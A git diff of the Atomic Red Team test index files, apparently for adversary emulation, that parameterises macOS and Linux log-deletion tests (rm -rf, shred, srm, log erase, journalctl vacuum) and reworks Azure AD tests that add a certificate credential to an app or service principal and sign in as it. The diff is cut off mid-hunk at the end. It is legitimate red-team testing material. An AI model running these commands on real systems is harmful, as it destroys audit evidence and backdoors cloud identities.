diff --git a/atomics/Indexes/azure-ad-index.yaml b/atomics/Indexes/azure-ad-index.yaml
index 43a59236..e3f59826 100644
--- a/atomics/Indexes/azure-ad-index.yaml
+++ b/atomics/Indexes/azure-ad-index.yaml
@@ -37535,14 +37535,6 @@ persistence:
description: Name of the targeted service principal
type: string
default: SuperSP
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -37566,21 +37558,18 @@ persistence:
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
- $certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
- $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
- Write-Host "Generated certificate ""$thumb"""
- $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
- Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
+ $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+ $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+ Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
- $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -37593,8 +37582,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
- | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"
- -ErrorAction Ignore\n"
+ | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
- name: Azure AD Application Hijacking - App Registration
@@ -37618,14 +37606,6 @@ persistence:
description: Name of the targeted application
type: string
default: SuperApp
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -37649,21 +37629,18 @@ persistence:
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
- $certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
- $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
- Write-Host "Generated certificate ""$thumb"""
- $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
- Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
+ $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+ $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+ Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
- $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -37676,8 +37653,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
- | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"
- -ErrorAction Ignore\n"
+ | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
T1053.004:
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index d7b4d4e8..c1ff28fe 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -4580,10 +4580,33 @@ defense-evasion:
supported_platforms:
- macos
- linux
+ input_arguments:
+ syslog_path:
+ description: path of syslog file to delete. On macos it's /var/log/system.log*,
+ on linux, it's /var/log/syslog*. Also note for File events, that on macos,
+ /var/ is a link to /private/var/.
+ type: string
+ default: "/var/log/system.log"
+ macos_audit_path:
+ description: path of audit file to delete
+ type: string
+ default: "/var/audit/20220725213300.202208110700021"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi
+ && stat #{syslog_path}
+
+ '
+ get_prereq_command: |
+ touch #{syslog_path}
+ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
executor:
command: |
- sudo rm -rf /private/var/log/system.log*
- sudo rm -rf /private/var/audit/*
+ sudo rm -rf #{syslog_path}
+ if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
name: sh
elevation_required: true
- name: Delete log files using built-in log utility
@@ -4598,7 +4621,6 @@ defense-evasion:
command: |
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
- sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
name: sh
elevation_required: true
- name: Truncate system log files via truncate utility
@@ -4610,9 +4632,25 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: "sudo truncate -s 0 /var/log/system.log #size parameter shorthand\nsudo
- truncate --size=0 /var/log/system.log #size parameter \n"
+ command: "sudo truncate -s 0 #{system_log_path} #size parameter shorthand\nsudo
+ truncate --size=0 #{system_log_path} #size parameter \n"
name: sh
elevation_required: true
- name: Delete log files via cat utility by appending /dev/null or /dev/zero
@@ -4624,10 +4662,26 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
command: |
- sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
- sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+ sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
+ sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
name: sh
elevation_required: true
- name: System log file deletion via find utility
@@ -4638,11 +4692,37 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_name1:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log
+ system_log_name2:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log.97.gz
+ system_log_name3:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log.98.gz
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat /var/log/#{system_log_name1} /var/log/#{system_log_name2}
+ /var/log/#{system_log_name3}
+
+ '
+ get_prereq_command: 'touch /var/log/#{system_log_name1} /var/log/#{system_log_name2}
+ /var/log/#{system_log_name3}
+
+ '
executor:
command: |
- sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
- sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
- sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
+ sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution
+ sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
+ sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution
name: sh
elevation_required: true
- name: Overwrite macOS system log via echo utility
@@ -4653,8 +4733,13 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
executor:
- command: 'sudo echo '''' > /var/log/system.log
+ command: 'sudo echo '''' > #{system_log_path}
'
name: sh
@@ -4680,8 +4765,24 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'sudo unlink /var/log/system.log
+ command: 'sudo unlink #{system_log_path}
'
name: sh
@@ -4694,8 +4795,24 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'sudo shred -u -z -n 3 /var/log/system.log
+ command: 'sudo shred -u -z -n 3 #{system_log_path}
'
name: sh
@@ -4708,10 +4825,31 @@ defense-evasion:
Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ system_log_folder:
+ description: path to log parent folder
+ type: string
+ default: "/var/log/"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path} #{system_log_folder}
+
+ '
+ get_prereq_command: 'mkdir -p #{system_log_folder} && touch #{system_log_path}
+ #{system_log_folder}/system.log
+
+ '
executor:
command: |
- sudo srm /var/log/system.log #system log file deletion
- sudo srm -r /var/log/ #recursive deletion of log files
+ sudo srm #{system_log_path} #system log file deletion
+ sudo srm -r #{system_log_folder} #recursive deletion of log files
name: sh
elevation_required: true
- name: Delete system log files using OSAScript
@@ -4723,8 +4861,24 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'osascript -e ''do shell script "rm /var/log/system.log" with administrator
+ command: 'osascript -e ''do shell script "rm #{system_log_path}" with administrator
privileges''
'
@@ -4738,8 +4892,24 @@ defense-evasion:
Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'osascript -e ''tell application "Finder" to delete POSIX file "/var/log/system.log"''
+ command: 'osascript -e ''tell application "Finder" to delete POSIX file "#{system_log_path}"''
'
name: sh
@@ -4753,9 +4923,25 @@ defense-evasion:
'
supported_platforms:
- linux
+ input_arguments:
+ journal_folder:
+ description: path to journal logs
+ type: string
+ default: "/var/log/journal"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{journal_folder}
+
+ '
+ get_prereq_command: 'mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
+
+ '
executor:
command: |
- sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
+ sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
name: sh
elevation_required: true
@@ -4773,7 +4959,19 @@ defense-evasion:
description: Username of mail spool
type: string
default: root
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat /var/spool/mail/#{username}
+
+ '
+ get_prereq_command: 'touch /var/spool/mail/#{username}
+
+ '
executor:
+ elevation_required: true
command: 'echo 0> /var/spool/mail/#{username}
'
@@ -4796,6 +4994,11 @@ defense-evasion:
'
name: bash
+ elevation_required: true
+ cleanup_command: 'if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path}
+ ; fi
+
+ '
T1218.004:
technique:
x_mitre_platforms:
@@ -62806,14 +63009,6 @@ persistence:
description: Name of the targeted service principal
type: string
default: SuperSP
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -62837,21 +63032,18 @@ persistence:
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
- $certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
- $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
- Write-Host "Generated certificate ""$thumb"""
- $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
- Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
+ $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+ $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+ Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
- $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -62864,8 +63056,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
- | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"
- -ErrorAction Ignore\n"
+ | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
- name: Azure AD Application Hijacking - App Registration
@@ -62889,14 +63080,6 @@ persistence:
description: Name of the targeted application
type: string
default: SuperApp
- certificate_password:
- description: Password of the new certificate
- type: string
- default: Passw0rd
- path_to_cert:
- description: Path of the new certificate, locally stored
- type: string
- default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -62920,21 +63103,18 @@ persistence:
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
- $certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
- $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
- Write-Host "Generated certificate ""$thumb"""
- $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
- Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
+ $certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
- $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+ $cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+ Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
- $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+ $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -62947,8 +63127,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
- | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"
- -ErrorAction Ignore\n"
+ | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
- name: AWS - Create Access Key and Secret Key
diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml
index d2498783..a9103054 100644
--- a/atomics/Indexes/linux-index.yaml
+++ b/atomics/Indexes/linux-index.yaml
@@ -3310,10 +3310,33 @@ defense-evasion:
supported_platforms:
- macos
- linux
+ input_arguments:
+ syslog_path:
+ description: path of syslog file to delete. On macos it's /var/log/system.log*,
+ on linux, it's /var/log/syslog*. Also note for File events, that on macos,
+ /var/ is a link to /private/var/.
+ type: string
+ default: "/var/log/system.log"
+ macos_audit_path:
+ description: path of audit file to delete
+ type: string
+ default: "/var/audit/20220725213300.202208110700021"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi
+ && stat #{syslog_path}
+
+ '
+ get_prereq_command: |
+ touch #{syslog_path}
+ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
executor:
command: |
- sudo rm -rf /private/var/log/system.log*
- sudo rm -rf /private/var/audit/*
+ sudo rm -rf #{syslog_path}
+ if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
name: sh
elevation_required: true
- name: Delete system journal logs via rm and journalctl utilities
@@ -3325,9 +3348,25 @@ defense-evasion:
'
supported_platforms:
- linux
+ input_arguments:
+ journal_folder:
+ description: path to journal logs
+ type: string
+ default: "/var/log/journal"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{journal_folder}
+
+ '
+ get_prereq_command: 'mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
+
+ '
executor:
command: |
- sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
+ sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
name: sh
elevation_required: true
@@ -3345,7 +3384,19 @@ defense-evasion:
description: Username of mail spool
type: string
default: root
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat /var/spool/mail/#{username}
+
+ '
+ get_prereq_command: 'touch /var/spool/mail/#{username}
+
+ '
executor:
+ elevation_required: true
command: 'echo 0> /var/spool/mail/#{username}
'
@@ -3368,6 +3419,11 @@ defense-evasion:
'
name: bash
+ elevation_required: true
+ cleanup_command: 'if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path}
+ ; fi
+
+ '
T1218.004:
technique:
x_mitre_platforms:
diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml
index fa9e9661..2c80a7c9 100644
--- a/atomics/Indexes/macos-index.yaml
+++ b/atomics/Indexes/macos-index.yaml
@@ -3041,10 +3041,33 @@ defense-evasion:
supported_platforms:
- macos
- linux
+ input_arguments:
+ syslog_path:
+ description: path of syslog file to delete. On macos it's /var/log/system.log*,
+ on linux, it's /var/log/syslog*. Also note for File events, that on macos,
+ /var/ is a link to /private/var/.
+ type: string
+ default: "/var/log/system.log"
+ macos_audit_path:
+ description: path of audit file to delete
+ type: string
+ default: "/var/audit/20220725213300.202208110700021"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi
+ && stat #{syslog_path}
+
+ '
+ get_prereq_command: |
+ touch #{syslog_path}
+ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
executor:
command: |
- sudo rm -rf /private/var/log/system.log*
- sudo rm -rf /private/var/audit/*
+ sudo rm -rf #{syslog_path}
+ if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
name: sh
elevation_required: true
- name: Delete log files using built-in log utility
@@ -3059,7 +3082,6 @@ defense-evasion:
command: |
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
- sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
name: sh
elevation_required: true
- name: Truncate system log files via truncate utility
@@ -3071,9 +3093,25 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: "sudo truncate -s 0 /var/log/system.log #size parameter shorthand\nsudo
- truncate --size=0 /var/log/system.log #size parameter \n"
+ command: "sudo truncate -s 0 #{system_log_path} #size parameter shorthand\nsudo
+ truncate --size=0 #{system_log_path} #size parameter \n"
name: sh
elevation_required: true
- name: Delete log files via cat utility by appending /dev/null or /dev/zero
@@ -3085,10 +3123,26 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path of system log to delete.
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
command: |
- sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
- sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
+ sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
+ sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
name: sh
elevation_required: true
- name: System log file deletion via find utility
@@ -3099,11 +3153,37 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_name1:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log
+ system_log_name2:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log.97.gz
+ system_log_name3:
+ description: name or prefix of system log to delete.
+ type: string
+ default: system.log.98.gz
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat /var/log/#{system_log_name1} /var/log/#{system_log_name2}
+ /var/log/#{system_log_name3}
+
+ '
+ get_prereq_command: 'touch /var/log/#{system_log_name1} /var/log/#{system_log_name2}
+ /var/log/#{system_log_name3}
+
+ '
executor:
command: |
- sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
- sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
- sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
+ sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution
+ sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
+ sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution
name: sh
elevation_required: true
- name: Overwrite macOS system log via echo utility
@@ -3114,8 +3194,13 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
executor:
- command: 'sudo echo '''' > /var/log/system.log
+ command: 'sudo echo '''' > #{system_log_path}
'
name: sh
@@ -3141,8 +3226,24 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'sudo unlink /var/log/system.log
+ command: 'sudo unlink #{system_log_path}
'
name: sh
@@ -3155,8 +3256,24 @@ defense-evasion:
'
supported_platforms:
- macos
+ input_arguments:
+ system_log_path:
+ description: path to system.log
+ type: string
+ default: "/var/log/system.log"
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'target files must exist
+
+ '
+ prereq_command: 'stat #{system_log_path}
+
+ '
+ get_prereq_command: 'touch #{system_log_path}
+
+ '
executor:
- command: 'sudo shred -u -z -n 3 /var/log/system.log
+ command: 'sudo shred -u -z -n 3 #{system_log_path}
'
name: sh
@@ -3169,10 +3286,31 @@ defense-evasion:
Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
supported_platforms:
- macos
+ input_arguments:
